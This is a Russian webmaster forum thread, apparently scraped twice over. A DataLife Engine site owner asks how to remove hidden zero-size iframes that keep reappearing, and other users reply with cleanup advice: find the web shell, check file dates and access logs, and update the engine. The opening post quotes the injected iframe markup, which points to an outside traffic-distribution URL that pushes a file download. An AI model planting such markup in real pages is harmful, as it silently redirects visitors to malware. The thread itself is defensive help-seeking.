помогите убрать iframe

**Максуд** · 22.11.2012 21:30

в шаблоне для DLE вставлен такой код:
<iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe><iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe>

между тегами Head, я его убираю, сохраняю изменения, но он опять выходит? это ссылка направляет на загрузку какого-то файла, как убрать этот код навсегда?

**OKyJIucT** · 22.11.2012 21:42

Судя по всему, кто то пользуется дыркой на вашем сайте, налицо признаки Simple TDS.

Надо движок скорей всего обновлять на официальный, ну или хотя бы не нуленный. Скорей всего шелл засел в каком то файле, с злоумышленник постоянно обновляет содержимое вашего сайта.

На крайний случай, если обновление невозможно, зайдите на сервер под root-ом, и поставьте на файл main.tpl пользователя root. В этом случае злодей не сможет скорей всего заменить его содержимое.

Даже вы не сможете скорей всего из админки отредактировать шаблон. Ну или попробуйте поставить на него права 444, однако в этом случае он может не открываться. Поэтому попробуйте оба варианта.

Если не помогут, тогда только искать дырку, или обновить движок.

**ohmygod** · 22.11.2012 22:11

И пароли от хостинга/админки желательно потом поменять.

**ageta** · 23.11.2012 13:11

Скорее всего через дырку в каком то компоненте он влазиет. На одном сайте одного из клиентов на WP я удалил, но от влазил через компонент формы обратной связи. Отключил компонент, перестал залазить. Скопируйте сайт полностью себе на комп, поиском поищите ссылки на _newtraff.ru, может увидите где он еще прошит. Посмотрите даты изменения файлов, станет понятно где рылись и что меняли.

**izyalex** · 23.11.2012 13:32

Максуд,
1. ищешь шеллы, смотришь дату создания файла, запоминаешь Ctrl+C
2. идешь в логи доступа, делаешь выборку по дате создания шелла
3. внимательно анализируешь пост запросы, тоже можно сделать выборку
4. устраняешь дыру и радуешься спокойной жизни

**Максуд** · 23.11.2012 14:33

Всем спасибо за помощь, сегодня же все сделаю

**xclsv** · 23.11.2012 15:34

Уже писал в подобной теме. Было такое неоднократно на сайтах клиентов. Однажды проблема не исчезла до тех пор, пока не перевез сайт на другой хостинг. ТС, удачи в решении проблемы.

	22.11.2012 21:30 #1
Максуд Новичок Регистрация: 09.10.2012 Сообщений: 20 Репутация: 0	в шаблоне для DLE вставлен такой код: <iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe><iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe> между тегами Head, я его убираю, сохраняю изменения, но он опять выходит? это ссылка направляет на загрузку какого-то файла, как убрать этот код навсегда?
0 Максуд

	22.11.2012 21:42 #2
OKyJIucT Sunshine reggae Регистрация: 02.09.2011 Сообщений: 3,240 Репутация: 1830 Webmoney BL: ?	Судя по всему, кто то пользуется дыркой на вашем сайте, налицо признаки Simple TDS. Надо движок скорей всего обновлять на официальный, ну или хотя бы не нуленный. Скорей всего шелл засел в каком то файле, с злоумышленник постоянно обновляет содержимое вашего сайта. На крайний случай, если обновление невозможно, зайдите на сервер под root-ом, и поставьте на файл main.tpl пользователя root. В этом случае злодей не сможет скорей всего заменить его содержимое. Даже вы не сможете скорей всего из админки отредактировать шаблон. Ну или попробуйте поставить на него права 444, однако в этом случае он может не открываться. Поэтому попробуйте оба варианта. Если не помогут, тогда только искать дырку, или обновить движок. VPS SSD с отличной поддержкой
0 OKyJIucT

	22.11.2012 22:11 #3
ohmygod Гуру Регистрация: 30.04.2011 Сообщений: 1,064 Репутация: 268 Webmoney BL: ?	И пароли от хостинга/админки желательно потом поменять.
0 ohmygod

	23.11.2012 13:11 #4
ageta Студент Регистрация: 13.07.2012 Сообщений: 38 Репутация: 4	Скорее всего через дырку в каком то компоненте он влазиет. На одном сайте одного из клиентов на WP я удалил, но от влазил через компонент формы обратной связи. Отключил компонент, перестал залазить. Скопируйте сайт полностью себе на комп, поиском поищите ссылки на _newtraff.ru, может увидите где он еще прошит. Посмотрите даты изменения файлов, станет понятно где рылись и что меняли.
0 ageta

	23.11.2012 13:32 #5
izyalex Опытный Регистрация: 20.11.2012 Сообщений: 254 Репутация: 38 Webmoney BL: ?	Максуд, 1. ищешь шеллы, смотришь дату создания файла, запоминаешь Ctrl+C 2. идешь в логи доступа, делаешь выборку по дате создания шелла 3. внимательно анализируешь пост запросы, тоже можно сделать выборку 4. устраняешь дыру и радуешься спокойной жизни
0 izyalex

помогите убрать iframe

Опции темы

Тэги топика:

Похожие темы

Помогите убрать ссылку!

Помогите убрать записи из рубрик

Помогите убрать ссылки в подвале

Вирус прописал iframe в базу данных. Помогите разобраться!

Помогите убрать ЗАРАЗУ !!!

Тем:

Сообщений:

Пользователей:

Сейчас на сайте:

Вход

Сайт

Разделы

Прочее

Следите за нами

Витрина ссылок

У нас проходит

У кого попросить инвайт?

Золотые темы форума

Последние новости

Популярные темы

Информеры

	23.11.2012 14:33 #6
Максуд Новичок Регистрация: 09.10.2012 Сообщений: 20 Репутация: 0	Всем спасибо за помощь, сегодня же все сделаю
0 Максуд

	23.11.2012 15:34 #7
xclsv Дипломник Регистрация: 26.12.2011 Сообщений: 148 Репутация: 17	Уже писал в подобной теме. Было такое неоднократно на сайтах клиентов. Однажды проблема не исчезла до тех пор, пока не перевез сайт на другой хостинг. ТС, удачи в решении проблемы.
0 xclsv

Темы	Раздел	Ответов	Последний пост
Помогите убрать ссылку!	DLE	6	22.10.2012 18:28
Помогите убрать записи из рубрик	WordPress	3	27.09.2012 20:21
Помогите убрать ссылки в подвале	WordPress	4	08.01.2012 18:29
Вирус прописал iframe в базу данных. Помогите разобраться!	Web программирование	5	30.01.2011 23:29
Помогите убрать ЗАРАЗУ !!!	Дорвеи и black SEO	3	16.10.2010 23:00